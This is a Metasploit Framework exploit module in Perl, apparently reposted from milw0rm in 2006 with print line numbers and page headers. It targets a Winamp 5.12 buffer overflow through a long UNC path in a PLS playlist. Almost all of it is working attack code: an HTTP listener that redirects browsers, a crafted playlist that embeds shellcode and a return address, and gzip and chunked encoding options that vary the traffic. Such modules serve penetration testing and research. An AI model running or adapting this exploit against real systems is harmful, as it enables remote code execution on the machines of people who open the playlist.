##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
  10   package Msf::Exploit::winamp_playlist_unc;
use strict;
use base "Msf::Exploit";

use IO::Socket::INET;
use IO::Compress::Gzip qw(gzip $GzipError);
use IPC::Open3;

use Pex::Text;
  18    my $advanced =
  19     {
  20           ’Gzip’           => [1, ’Enable gzip content encoding’],
  21           ’Chunked’        => [1, ’Enable chunked transfer encoding’],
  22           ’Humor’           => [0, ’Enable humorous song names’],
  23     };
  25   my $info =
  26     {
  27           ’Name’                 => ’Winamp Playlist UNC Path Computer Name Overflow’,
  28           ’Version’            => ’$Revision: 1.3 $’,
  29           ’Authors’            =>
  30             [
  31                       ’H D Moore <hdm [at] metasploit.com’,
  32                       ’Faithless <rhyskidd [at] gmail.com>’,
  33                ],
  34
  35             ’Description’    =>
  36               Pex::Text::Freeform(qq{
  37                        This module exploits a vulnerability in the Winamp media player.
  38             This flaw is triggered when a audio file path is specified, inside a
  39             playlist, that consists of a UNC path with a long computer name. This
  40             module delivers the playlist via the browser.
  41   }),
  42
  43             ’Arch’               => [ ’x86’ ],
  44             ’OS’                  => [ ’win32’, ’winxp’, ’win2003’ ],
  45             ’Priv’              => 0,
  46
  47             ’AutoOpts’       => { ’EXITFUNC’ => ’process’ },
  48             ’UserOpts’       =>
  49               {
  50                       ’HTTPPORT’ => [ 1, ’PORT’, ’The local HTTP listener port’, 8080           ],
  51                       ’HTTPHOST’ => [ 0, ’HOST’, ’The local HTTP listener host’, "0.0.0.0" ],
  52                       ’REALHOST’ => [ 0, ’HOST’, ’External address to use for redirects (NAT)’ ],
H D Moore                                                                                                 01/31/2006
                         Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta             Page 2/6
  53              },
  54
  55            ’Payload’            =>
  56              {
  57                        ’Space’    => 526,
  58                        ’BadChars’ => "\x00\x5c\x2f\x0a\x0d\x20",
  59                        ’Keys’      => [’−bind’],
  60
  61                        # Landing on \x5c\x5c trashes esp, restore from ecx
  62                        ’PrependEncoder’ => "\x87\xe1",
  63
  64                        # Disable nop sleds completely (dont modify ecx)
  65                        ’MinNops’ => 0,
  66                        ’MaxNops’ => 0,
  67              },
  68            ’Refs’                =>
  69              [
  70                        [’BID’, ’16410’],
  71                        [’URL’, ’http://milw0rm.com/id.php?id=1458/’],
  72                        [’URL’, ’http://secunia.com/advisories/18649/’],
  73              ],
  74
  75            ’DefaultTarget’ => 0,
  76            ’Targets’         =>
  77              [
  78                      # Return to exe, 0x0d is replaced by 0x00 >:−)
  79                      [ ’Winamp 5.12 Universal’, 0x0d45fece ]
  80              ],
  81
  82            ’Keys’                => [ ’winamp’ ],
  83
  84            ’DisclosureDate’ => ’Jan 29 2006’,
  85      };
  87    sub new {
  88            my $class = shift;
  89            my $self = $class−>SUPER::new({’Info’ => $info, ’Advanced’ => $advanced}, @_);
  90            return($self);
  91    }
  93    sub Exploit
  94    {
  95            my $self = shift;
  96            my $server = IO::Socket::INET−>new(
  97                    LocalHost => $self−>GetVar(’HTTPHOST’),
  98                    LocalPort => $self−>GetVar(’HTTPPORT’),
  99                    ReuseAddr => 1,
  100                   Listen    => 1,
  101                   Proto     => ’tcp’
  102               );
  103           my $client;
  104

H D Moore                                                                                        01/31/2006
                        Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta                                           Page 3/6
  105           # Did the listener create fail?
  106           if (not defined($server)) {
  107                   $self−>PrintLine("[−] Failed to create local HTTP listener on " . $self−>GetVar(’HTTPPORT’));
  108                   return;
  109           }
  110
  111           my $httphost = $self−>GetVar(’HTTPHOST’);
  112           $httphost = Pex::Utils::SourceIP(’1.2.3.4’) if $httphost eq ’0.0.0.0’;
  113
  114           $self−>PrintLine("[*] Waiting for connections to http://". $httphost .":". $self−>GetVar(’HTTPPORT’) ."/");
  115
  116           while (defined($client = $server−>accept())) {
  117                   $self−>HandleHttpClient(Msf::Socket::Tcp−>new_from_socket($client));
  118           }
  119
  120           return;
  121   }
  123   sub HandleHttpClient
  124   {
  125           my $self = shift;
  126           my $fd     = shift;
  127
  128           # Set the remote host information
  129           my ($rport, $rhost) = ($fd−>PeerPort, $fd−>PeerAddr);
  130
  131           # Read the HTTP command
  132           my ($cmd, $url, $proto) = split / /, $fd−>RecvLine(10);
  133
  134           # Read the HTTP headers
  135           my $headers;
  136           while ( (my $line = $fd−>RecvLine(10))) {
  137                   $headers .= $line;
  138                   last if $line eq "\r\n";
  139           }
  140
  141           if ($url !~ /\.pls/i) {
  142                   $self−>PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting...");
  143                   my $content =
  144                           "<html><script>".
  145                           "document.location=’".RandomPath().".pls’".
  146                           "</script><body>".
  147                           "One second please...</body></html>";
  148
  149                     $fd−>Send($self−>BuildResponse($content));
  150                     $fd−>Close;
  151                     return;
  152           }
  153
  154           my $target_idx      = $self−>GetVar(’TARGET’);
  155           my $target          = $self−>Targets−>[$target_idx];
  156           my $shellcode       = $self−>GetVar(’EncodedPayload’)−>Payload;
H D Moore                                                                                                                     01/31/2006
                        Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta                                                     Page 4/6
  157
  158           my $name = Pex::Text::AlphaNumText(int(rand(32)+1));
  159           my $file = Pex::Text::AlphaNumText(1026);
  160
  161           substr($file, 1022, 4, pack(’V’, $target−>[1]));
  162           substr($file, 0, length($shellcode), $shellcode);
  163
  164           # Too many and it takes too long to load...
  165           my $pcnt = int(rand(10)+10);
  166           my $play =
  167                   "[playlist]\r\n".
  168
  169                               $self−>RandomNames($pcnt).
  170
  171                               "File".   ($pcnt+1). "=\\\\$file\r\n" .
  172                               "Title". ($pcnt+1). "=$name\r\n".
  173                               "Length". ($pcnt+1). "=".sprintf("%x",rand(1024)+1)."\r\n".
  174
  175                               "NumberOfEntries=".($pcnt+1)."\r\n".
  176                               "Version=2\r\n";
  177
  178           $self−>PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");
  179
  180
  181           $fd−>Send($self−>BuildResponse($play, "audio/x−scpls"));
  182
  183           # Prevents IE from throwing an error in some cases
  184           select(undef, undef, undef, 0.1);
  185
  186           $fd−>Close();
  187   }
  189   sub RandomPath {
  190           my $self = shift;
  191           my $path;
  192
  193           while (length($path) < 32) {
  194                   $path .= "/" . Pex::Text::AlphaNumText(int(rand(30) + 5));
  195           }
  196           return $path;
  197   }
  199   sub RandomNames {
  200           my $self = shift;
  201           return $self−>RandomNamesFun(@_) if $self−>GetVar(’Humor’);
  202           my $scnt = shift;
  203
  204           my $ppad = ’’;
  205
  206           for my $idx (1..$scnt) {
  207                   my $pname = Pex::Text::AlphaNumText(int(rand(32)+1));
  208                   my $pfile = Pex::Text::AlphaNumText(int(rand(32)+1)).".mp3";
H D Moore                                                                                                                               01/31/2006
                        Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta           Page 5/6
  209                     $ppad .=
  210                             "File".    ($idx). "=".$pfile."\r\n" .
  211                             "Title". ($idx). "=".$pname."\r\n".
  212                              "Length". ($idx). "=".sprintf("%x",rand(1024)+1)."\r\n";
  213           }
  214           return $ppad;
  215   }
  217   sub BuildResponse {
  218            my ($self, $content, $ctype) = @_;
  219            $ctype ||= "text/html";
  220
  221           my $response =
  222             "HTTP/1.1 200 OK\r\n" .
  223             "Content−Type: $ctype\r\n";
  224
  225           if ($self−>GetVar(’Gzip’)) {
  226                    $response .= "Content−Encoding: gzip\r\n";
  227                    $content = $self−>Gzip($content);
  228           }
  229           if ($self−>GetVar(’Chunked’)) {
  230                    $response .= "Transfer−Encoding: chunked\r\n";
  231                    $content = $self−>Chunk($content);
  232           } else {
  233                    $response .= ’Content−Length: ’ . length($content) . "\r\n" .
  234                      "Connection: close\r\n";
  235           }
  236
  237           $response .= "\r\n" . $content;
  238
  239           return $response;
  240   }
  242   sub Chunk {
  243           my ($self, $content) = @_;
  244
  245           my $chunked;
  246           while (length($content)) {
  247                   my $chunk = substr($content, 0, int(rand(10) + 1), ’’);
  248                   $chunked .= sprintf(’%x’, length($chunk)) . "\r\n$chunk\r\n";
  249           }
  250           $chunked .= "0\r\n\r\n";
  251
  252           return $chunked;
  253   }
  255   sub Gzip {
  256           my $self = shift;
  257           my $data = shift;
  258           my $comp = int(rand(5))+10;
  259
  260           my($wtr, $rdr, $err);
H D Moore                                                                                     01/31/2006
                         Winamp 5.12 Crafted PLS Remote Buffer Overflow Exploit meta         Page 6/6
  261
  262            my $pid = open3($wtr, $rdr, $err, ’gzip’, ’−’.$comp, ’−c’, ’−−force’);
  263            print $wtr $data;
  264            close ($wtr);
  265            local $/;
  266
  267            return (<$rdr>);
  268   }
  271   sub RandomNamesFun {
  272           my $self = shift;
  273           my $scnt = shift;
  274           my @ffun =
  275           (
  276                   "Angelina vs Rosie O − Butter Time",
  277                   "Richards Gerbil Adventure",
  278                   "Elton John Bachelor Party",
  279                   "Paris Hilton Greased Chihuahua",
  280                   "OH MY GOD",
  281                   "SOMEONE IS OWNING",
  282                   "MY WINAMP!",
  283           );
  284
  285            my $ppad = ’’;
  286
  287            for my $idx (1..$scnt) {
  288                    my $pname = $ffun[ $idx % scalar(@ffun) ];
  289                    $ppad .=
  290                            "File".    ($idx). "=".$pname."\r\n" .
  291                            "Title". ($idx). "=".$pname."\r\n".
  292                             "Length". ($idx). "=".sprintf("%x",rand(1024)+1)."\r\n";
  293            }
  294            return $ppad;
  295   }
  296   1;
# milw0rm.com [2006-01-31]



